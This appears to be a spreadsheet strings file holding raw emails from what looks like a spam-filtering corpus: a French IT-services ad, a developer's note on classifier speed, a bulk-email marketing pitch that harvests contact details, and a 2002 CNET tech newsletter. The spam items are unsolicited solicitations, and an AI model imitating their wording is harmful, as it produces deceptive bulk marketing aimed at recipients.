               &amp;agrave; IPOGEA, votre entreprise &lt;br&gt;
               &amp;nbsp;&amp;nbsp;&amp;nbsp;se dote d'un v&amp;eacute;ritable service &lt;br&gt;
               &amp;nbsp;&amp;nbsp;&amp;nbsp;informatique sans pour autant &lt;br&gt;
               &amp;nbsp;&amp;nbsp;&amp;nbsp;supporter les co&amp;ucirc;ts d'un &lt;br&gt;
               &amp;nbsp;&amp;nbsp;&amp;nbsp;recrutement &amp;agrave; temps complet.&lt;br&gt;
               &lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
           &lt;td valign="top" colspan="2" height="2"&gt;&lt;font color="CF3702" size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;UN 
             REGARD OBJECTIF : &lt;/b&gt; &lt;/font&gt;&lt;br&gt;
             &lt;font color="E87429" size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;IPOGEA 
             est ind&amp;eacute;pendant des constructeurs &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;et des &amp;eacute;diteurs, ce qui vous garanti la &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;parfaite objectivit&amp;eacute; de nos conseils.&lt;br&gt;
             &lt;br&gt;
             &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" width="9"&gt;&amp;nbsp;&lt;/td&gt;
           &lt;td valign="top" &gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="CF3702"&gt;&lt;b&gt;&lt;br&gt;
             DES TARIFS SANS SURPRISES : &lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif" color="E87429"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;La 
             facturation de nos services &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;est mensuelle et forfaitaire.&lt;/font&gt;&lt;/td&gt;
           &lt;td valign="top" width="38" &gt;&amp;nbsp;&lt;/td&gt;
           &lt;td valign="top" &gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="CF3702"&gt;TESTER 
             NOS SERVICES :&lt;/font&gt;&lt;/b&gt; &lt;br&gt;
             &lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif" color="E87429"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;Vous 
             pouvez tester nos services&lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;pendant 3 mois et rompre le &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;contrat &amp;agrave; tout moment pendant &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;cette p&amp;eacute;riode.&lt;br&gt;
             &lt;br&gt;
             &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/TD&gt;
  	&lt;TD &gt;&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=253&gt;&lt;/TD&gt;
   &lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=5&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_11.jpg" WIDTH=567 HEIGHT=13&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=13&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ROWSPAN=2&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_12.jpg" WIDTH=12 HEIGHT=130&gt;&lt;/TD&gt;
 		&lt;TD COLSPAN=4&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_13.jpg" WIDTH=555 HEIGHT=1&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=1&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD COLSPAN=2 ROWSPAN=2&gt;
       &lt;div align="center"&gt;&lt;font color="#31266a" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Vous 
         souhaitez plus d'informations !&lt;/font&gt;&lt;font size="3"&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;a href="http://www.ipogea.com/appel/index.php3?prov=SLAG2705"&gt;&lt;img src="http://www.ipogea.com/images/news2/bouton.gif" 
 height="60" border="0"&gt;&lt;/a&gt; 
         &lt;br&gt;
         &lt;font size="2"&gt;Un conseiller vous appelle&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
     &lt;/TD&gt;
 		&lt;TD ROWSPAN=2&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_15.jpg" WIDTH=10 HEIGHT=130&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=120&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_17.jpg" WIDTH=12 HEIGHT=1&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=1&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=4&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/ipo_18.jpg" WIDTH=566 HEIGHT=16&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.ipogea.com/images/news2/spacer.gif" WIDTH=1 HEIGHT=16&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=4 height="12"&gt; 
       &lt;div align="center"&gt; 
         &lt;p align="right"&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif" color="E87429"&gt;*pour 
           toute signature d'un contrat de 12 mois avant le 30/06/02&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font face=Arial size=2&gt;&lt;font face=Verdana, Arial, Helvetica, sans-serif color=#000000 size=-5 font&gt;&lt;i&gt;Si 
           vous ne souhaitez plus recevoir ce courrier, &lt;a 
 href="mailto:desabonnement@ipogea.com?subject=REMOVE"&gt;cliquez ici&lt;/a&gt;&lt;/i&gt;&lt;/font&gt; 
           &lt;br&gt;
           &amp;nbsp; &lt;/font&gt; &lt;/p&gt;
       &lt;/div&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">[Neale Pickett]
 &gt; ...
 &gt; If you can spare the memory, you might get better performance in this
 &gt; case using the pickle store, since it only has to go to disk once (but
 &gt; boy, does it ever go to disk!)  I can't think of anything obvious to
 &gt; speed things up once it's all loaded into memory, though.
 On my box the current system scores about 50 msgs per second (starting in
 memory, of course).  While that can be a drag while waiting for one of my
 full test runs to complete (one of those scores a message more than 120,000
 times, and trains more than 30,000 times), I've got no urge to do any speed
 optimizations -- if I were using this for my own email, I'd never notice the
 drag.  Guido will bitch like hell about waiting an extra second for his
 50-msg batches to score, but he's the boss so he bitches about everything
 &lt;wink&gt;.
 &gt; That's profiler territory, and profiling is exactly the kind of
 &gt; optimization I just said I wasn't going to do :)
 I haven't profiled yet, but *suspect* there aren't any egregious hot spots.
 5-gram'ing of long words with high-bit characters is likely overly expensive
 *when* it happens, but it doesn't happen that often, and as an approach to
 non-English languages it sucks anyway (i.e., there's no point speeding
 something that ought to be replaced entirely).
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Increase Your Business Sales NOW     adv          mnbfa
</t>
  </si>
  <si>
    <t xml:space="preserve">Email marketing - if done right - is both highly effective and amazingly cost effective.  OK, it can be 
 downright PROFITABLE.  If done right.
 Imagine sending your sales letter to one million, two million, ten million or more prospects during 
 the night.  Then waking up to sales orders, ringing phones, and an inbox full of freshly qualified 
 leads.
 We've been in the email business for over seven years now.
 Our lists are large, current, and deliverable.  We have more servers and bandwidth than we currently 
 need.  That's why we're sending you this note.  We'd like to help you make your email marketing 
 program more robust and profitable.
 Please give us permission to call you with a proposal custom tailored to your business.  Just fill out 
 this form to get started:
 Name _______________________
 Email Address ________________
 Phone Number ________________
 URL or Web Address ___________
 I think you'll be delighted with the bottom line results we'll deliver to your company.
 Click Here: mailto:batch1@btamail.net.cn?subject=Inquiry-Including-Contact-Info
 Thank You!
 Remove requests Click Here: mailto:batch1@btamail.net.cn?subject=remove-b2b-list
 vkmoitjkwtwgpxprfmsmqeywcuar
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;THE WEEK IN REVIEW: Harvest at Macworld&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#e5e5e5"&gt;
 &lt;center&gt;
 &lt;a name=3D"top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612 bgcolor=3D"#f=
 fffff"&gt;
 =09&lt;tr valign=3Dtop&gt;
     &lt;td width=3D442 colspan=3D4 bgcolor=3D"#e5e5e5"&gt;
         &lt;img src=3D"http://home.cnet.com/i/ne/ds/dhed.gif" alt=3D"" width=
 =3D"442" height=3D"63" border=3D"0"&gt;&lt;br&gt;
     &lt;/td&gt;
     &lt;td width=3D160 rowspan=3D2&gt;
 &lt;!-- Towerboard --&gt;
 =09&lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2560" scrol=
 ling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" widt=
 h=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /Towerboard --&gt;
 =09&lt;p&gt;
 =09&lt;!-- search form --&gt;
 =09&lt;TABLE border=3D0 cellPadding=3D2 cellSpacing=3D0 width=3D150&gt;
 =09&lt;TR&gt;
 =09&lt;TD&gt;
 =09&lt;form method=3D"GET" action=3D"http://www.search.com/redirect/"&gt;
 =09                &lt;img src=3D"/b.gif" width=3D1 height=3D4&gt;&lt;font face=3D"a=
 rial, helvetica" size=3D"-1"&gt;&lt;br&gt;&amp;nbsp;&lt;b&gt;Search&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 =09                &amp;nbsp;&lt;input type=3D"text" name=3D"q" size=3D"15" value=
 =3D""&gt;&lt;br&gt;
 =09                &amp;nbsp;&lt;select name=3D"target"&gt;
 =09                &lt;option value=3D"http://news.search.com/search?tag=3Dex.=
 ne.newsletter.srch.ne" selected&gt;News.com
 =09                &lt;option value=3D"http://cnet.search.com/search?tag=3Dex.=
 ne.newsletter.srch.cnet"&gt;All CNET&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 =09                &lt;option value=3D"http://www.search.com/search?tag=3Dex.n=
 e.newsletter.srch.web"&gt;The Web
                 &lt;/select&gt;&amp;nbsp;&lt;input type=3D"submit" value=3D"Go!" name=3D=
 "submit"&gt;&lt;/td&gt;&lt;/form&gt;
     &lt;/tr&gt;&lt;/table&gt;
     &lt;!-- /search form --&gt;
     &lt;p&gt;
 &lt;!-- Vertical Brick --&gt;
 &lt;IMG alt=3D"Also from CNET" height=3D20 src=3D"http://home.cnet.com/Ads/Med=
 ia/Images/RHC_ALSOfromCNETnet.gif" width=3D150 NOSEND=3D"1"&gt;&lt;BR&gt;
 &lt;TABLE border=3D0 cellPadding=3D2 cellSpacing=3D0 width=3D150&gt;&lt;TBODY&gt;&lt;TR vA=
 lign=3Dtop&gt;
 &lt;TD&gt;&lt;FONT face=3D"arial, helvetica" size=3D-1&gt;&lt;B&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Daa-gBteQXUQ1C_glmRWLXZBXqO=
 NOVsR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbf-JtRfQ8ZQwRYB4Kl5w8PF_jE=
 uwtZR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd4-E0SqQ0EHeeoXJa0_4Mc3148=
 lk6dR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dea-fjLyQhVa-0E5r3-AwQ4lAUw=
 -5WsR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dff-sVoVQmsafnyVitrZxrhBm0W=
 HthZR" &gt;ZDNet: PeopleSoft&lt;/a&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 =09=09&lt;p&gt;
 =09&lt;/td&gt;
 =09&lt;td width=3D9 rowspan=3D2&gt;
 =09=09&lt;table width=3D9 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#e5e5e5"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"50" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09&lt;/table&gt;
 =09&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000" rowspan=3D2&gt;&lt;img src=3D"http://home.cn=
 et.com/i/ne/ds/bkg.gif" width=3D"1" height=3D"50" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;!-- In the News / Special Reports --&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D430 bgcolor=3D"#ffffff"&gt;
 &lt;!-- START COPY FOR THE GUTS --&gt;
 &lt;table cellpadding=3D10 cellspacing=3D0 border=3D0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;b&gt;CNET | NEWS.COM WEEK IN REVIEW&lt;/b&gt;&lt;br&gt;
 The Entire Tech Week in a Single Email&lt;br&gt;
 Saturday, July 20, 2002&lt;p&gt;
 &lt;p&gt;
 &lt;b&gt;Mac fans flocked to the Macworld Expo in New York to watch Apple Compute=
 r trot out new hardware, software and even a Web services plan--but it migh=
 t be a challenge getting people to pay for the offerings.
 &lt;/b&gt;
 &lt;p&gt;
 Apple CEO Steve Jobs kicked off the trade show by &lt;a href=3D"http://clickth=
 ru.online.com/Click?q=3D14-5MRAIF-I438XVu98ZvQIzTKtR1dR" &gt;unveiling&lt;/a&gt; new=
  iPod digital-audio players and a new flat-panel iMac.
 &lt;p&gt;
 The new iPod players include models built specifically for computers that u=
 se Microsoft's Windows operating system. Apple lowered the price of the exi=
 sting 5GB iPod and a redesigned 10GB model, which is thinner and comes with=
  a new case and remote control. Jobs also introduced a beefier 20GB iPod fo=
 r $499. The iPod stable now includes three models for Mac users and three m=
 odels for Windows users with MusicMatch software.
 &lt;p&gt;
 As expected, Jobs introduced a new iMac model with a 17-inch flat-panel mon=
 itor. The model offers a widescreen display with 1,440-by-900-pixel resolut=
 ion versus 1,024-by-768-pixel resolution for the 15-inch iMac.
 &lt;p&gt;
 Jobs also previewed the next version of Mac OS X, version 10.2, which will =
 be on store shelves Aug. 24 for $129. OS X 10.2 includes a new Finder with =
 improved search features, spring-loaded folders and the ability to change t=
 he background photo as often as every 5 seconds.
 &lt;p&gt;
 But fans who rushed to OS X last year learned there's no such thing as a ch=
 eap upgrade when the company announced it will &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D29-Sg_rIjM3xjSzf59NyGEI9rCM8vcR" &gt;not offer&lt;/a&gt; a disc=
 ounted upgrade version of Mac OS X version 10.2, code-named Jaguar, to curr=
 ent users of the operating system. To get Jaguar, current OS X users will h=
 ave to buy a new Macintosh or an entirely new version of the operating syst=
 em for the retail price of $129.
 &lt;p&gt;
 Apple's decision not to sell a less-expensive upgrade version lay in the qu=
 alitative difference between version 10.1 and 10.2. Although the versions s=
 hare the same core technology, Jaguar includes several new features and ser=
 vices, such as search tool Sherlock 3 and Internet address finder Rendezvou=
 s, which arguably classify it as an entirely new piece of software.
 &lt;p&gt;
 Apple also raised eyebrows by &lt;a href=3D"http://clickthru.online.com/Click?=
 q=3D3e-F51nIizcfoh9HOq_7DQESNPe-iRR" &gt;transitioning&lt;/a&gt; its iTools Web serv=
 ices from a free program to a paid program called .Mac. The company plans t=
 o charge about $100 per year for the program. The collection of Web service=
 s was launched about three years ago, and now includes online storage via a=
  service called iDisk, online greeting cards through iCards and other featu=
 res.
 &lt;p&gt;
 Despite iTool's popularity, the company &lt;a href=3D"http://clickthru.online.=
 com/Click?q=3D53-n86dINniBiqIX-sjHpx8lOheMnlR" &gt;may face a tough sell&lt;/a&gt; w=
 ith the .Mac program. The history of paid services, is not a pretty picture=
 . Customers have bristled when companies try to slap charges on previously =
 free services. Some have succeeded but many have struggled, especially when=
  free alternatives lurked elsewhere. In the early 1990s, Apple's efforts to=
  form online communities and popularize search engines failed magnificently=
 .
 &lt;p&gt;
 To its advantage, Apple has presented a fairly coherent and tangible set of=
  services with .Mac. And although its software division is far more organiz=
 ed than it once was, it's unclear how overwhelming demand will be. However,=
  an &lt;a href=3D"http://clickthru.online.com/Click?q=3D68-iM8qIsPWu8FuzAvywvj=
 sK-FdLP4R" &gt;online petition&lt;/a&gt; protesting the new charges doesn't bode wel=
 l for the program.
 &lt;p&gt;
 &lt;b&gt;&lt;font color=3D"#CC0000"&gt;Microsoft's moves&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Not one to be caught in anyone's shadow, Microsoft plans to &lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D7d-FFEqIDLWMEqg-q9Uywq2NRJSBTeR" &gt;offer a=
  rebate&lt;/a&gt; for its Office suite for Mac OS X to those who buy the software=
  bundle when they pick up a new Mac. The promotion entails a $50 mail-in re=
 bate for people buying a new Mac and upgrading to Office v. X, and $100 for=
  those buying a Mac and the full version of the software.
 &lt;p&gt;
 The offers come after Microsoft revealed that sales of the software have no=
 t met its expectations. The software potentate had expected to sell 750,000=
  copies of Office v. X by now, but instead has sold only 300,000 since the =
 program went on sale last November.
 &lt;p&gt;
 Microsoft is also putting the &lt;a href=3D"http://clickthru.online.com/Click?=
 q=3D93-V4PmQSdrF0o9nH2cTYjvQ8Rgn5FR" &gt;finishing touches&lt;/a&gt; on the third co=
 llection of Windows 2000 bug fixes, which is nearly ready for release after=
  a protracted period of testing. The update, Windows 2000 Service Pack 3, c=
 ontains vital security updates and hundreds of fixes to bugs plaguing the o=
 perating system that Microsoft released in February 2000. Service Pack 3 co=
 uld be important for many businesses, as not all of the included security f=
 ixes are available as separate downloads.
 &lt;p&gt;
 Not everything will be available as a download, however. Weeks before Micro=
 soft plans to reinstate Java in Windows XP, it has &lt;a href=3D"http://clickt=
 hru.online.com/Click?q=3Da8-02XZQQZDjZijEBtDtZs6swzdON9R" &gt;shut down&lt;/a&gt; a =
 site that would automatically send its Java software to Windows XP users. T=
 he company closed the install-on-demand feature 30 days after it told Java =
 inventor Sun Microsystems it would reinstate Java in Windows XP through the=
  forthcoming Service Pack 1 but remove it altogether in 2004.
 &lt;p&gt;
 &lt;b&gt;&lt;font color=3D"#CC0000"&gt;Somebody's watching you&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 You better watch what you write in Yahoo's free e-mail service--because Yah=
 oo is. To protect users from malicious code, Yahoo uses an automated filter=
  to &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbd-c0nUQ7pV9moRKw2pAEV=
 gnfqGsJuR" &gt;swap out&lt;/a&gt; a handful of words such as "mocha" and "eval" that=
  pertain to Web code known as JavaScript.
 &lt;p&gt;
 The reason is that e-mail sent in a form known as "Web enhanced" can contai=
 n JavaScript instructions able to run programs on the recipient's PC. JavaS=
 cript is a Web language that can issue commands such as telling the browser=
  to open up other windows or to prompt a service to change a password, for =
 example.
 &lt;p&gt;
 "Mocha" is one of those special commands that can be run from Web-enhanced =
 e-mail. Typing "mocha:" into the location bar of the Netscape browser will =
 open a screen with a display area and a text box underneath, in which comma=
 nds can be entered. A malicious hacker could, for example, use the command =
 line to run a program that changes a person's password without that person'=
 s knowledge.
 &lt;p&gt;
 On the heels of plans for new powers to patrol people's Web use, the U.S. g=
 overnment is again turning to technology to &lt;a href=3D"http://clickthru.onl=
 ine.com/Click?q=3Dd2-THo_QULs_DzX3rh3Gl22vbAOyesR" &gt;monitor suspicious acti=
 vity&lt;/a&gt; in the name of fighting terrorism. The government has unveiled mor=
 e details of its Terrorist Information and Prevention System (TIPS), a plan=
  to recruit volunteers across the country who will keep tabs on dubious or =
 suspicious behavior.
 &lt;p&gt;
 "The program will involve the millions of American workers who, in the dail=
 y course of their work, are in a unique position to see potentially unusual=
  or suspicious activity in public places," according to the TIPS Web site. =
 But the American Civil Liberties Union, one of several critics of the plan,=
  fears the proposal will encourage racial profiling and vigilantism, possib=
 ly leading to searches of private homes without a warrant.
 &lt;p&gt;
 &lt;b&gt;&lt;font color=3D"#CC0000"&gt;Also of note&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 A handful of entrepreneurial technology companies are &lt;a href=3D"http://cli=
 ckthru.online.com/Click?q=3De7-2y-GQmVce3pzCGTVqS8CMB0qvsZR" &gt;advancing tec=
 hniques&lt;/a&gt; once used haphazardly by record companies and Napster-haters, i=
 n ways that may be far more destructive to the credibility of file-swapping=
  networks than were previous efforts...Apple &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3Dfc-WpHmQVwTaudE4Aca9-0t3VVat9dR" &gt;released&lt;/a&gt; the final=
  version of its QuickTime 6 digital media software, marking a stand-down in=
  a dispute over licensing fees...The Federal Trade Commission is &lt;a href=3D=
 "http://clickthru.online.com/Click?q=3D11-l8riI2-aPLcop-3X3VynhNBuCqcR" &gt;pl=
 anning&lt;/a&gt; to take a deeper look at whether some state laws illegally restr=
 ict Internet commerce...In one of the toughest sentences for online auction=
  fraud, a Virginia man was &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D26-KqPVIiMxelrEsJeBBBkqU8niQ7RR" &gt;sentenced&lt;/a&gt; to 12 years in prison fo=
 r defrauding hundreds of shoppers on eBay and Yahoo auction sites...The Hou=
 se of Representatives overwhelmingly approved a bill that would allow for &lt;=
 a href=3D"http://clickthru.online.com/Click?q=3D3c-tK4RIcIw_GtL-2JY0VXXjhrH=
 NHdR" &gt;life prison sentences&lt;/a&gt; for malicious computer hackers...MPEG LA, =
 a group of patent holders governing MPEG-4, &lt;a href=3D"http://clickthru.onl=
 ine.com/Click?q=3D51-QgUWIjJWhghTxK5Jlh9GpMUHM3rR" &gt;finalized licensing ter=
 ms&lt;/a&gt; for the media delivery standard, bowing to market pressure for manag=
 eable royalty rates...Several tech and telecommunications giants are &lt;a hre=
 f=3D"http://clickthru.online.com/Click?q=3D66-kDH_IyWzTRfhSOLsPj9y-DzbW-iR"=
  &gt;considering a joint venture&lt;/a&gt; to pepper the United States with wireless=
  "hot spots."
 &lt;p&gt;
 &lt;i&gt;Want more? Check out all this week's &lt;a href=3D"http://clickthru.online.=
 com/Click?q=3D7b-prT_IBZzgRSgmUpbDr4q1O7VpJlR" &gt;News.com headlines&lt;/a&gt;.&lt;/i&gt;
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"599" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://www.cnet.com/b.gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#eeeeee" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"575"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"10"&gt;&lt;br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D90-wHZMQ_IMRhBVirJVb8HYULu=
 onX9R" &gt;
 &lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width=3D"375" height=3D"=
 18" border=3D"0" alt=3D"Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;=
 br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletter=
 s@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF=3D'http://clickthru.online.com/Click?q=3Da5-DyfHrzZqSQXorbx=
 hdMk61qDcw2kf4dRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D'http://nl.com.com=
 /servlet/url_login?email=3Dqqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=3Dc=
 net'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3Dba-m-45QXpJTWkrcYwxhOmI_uIUEksR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a=
  href=3D"http://clickthru.online.com/Click?q=3Dcf-ebM-QLw1uwmMdU_JaylIO7r3f=
 xZR" &gt;Advertise&lt;/A&gt;&lt;p&gt;Please send any questions, comments, or concerns to&amp;n=
 bsp;&lt;a href=3D"mailto:dispatchfeedback@news.com"&gt;dispatchfeedback@news.com&lt;=
 /A&gt;.&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" width=3D"1" height=3D"8"&gt;&lt;/t=
 d&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
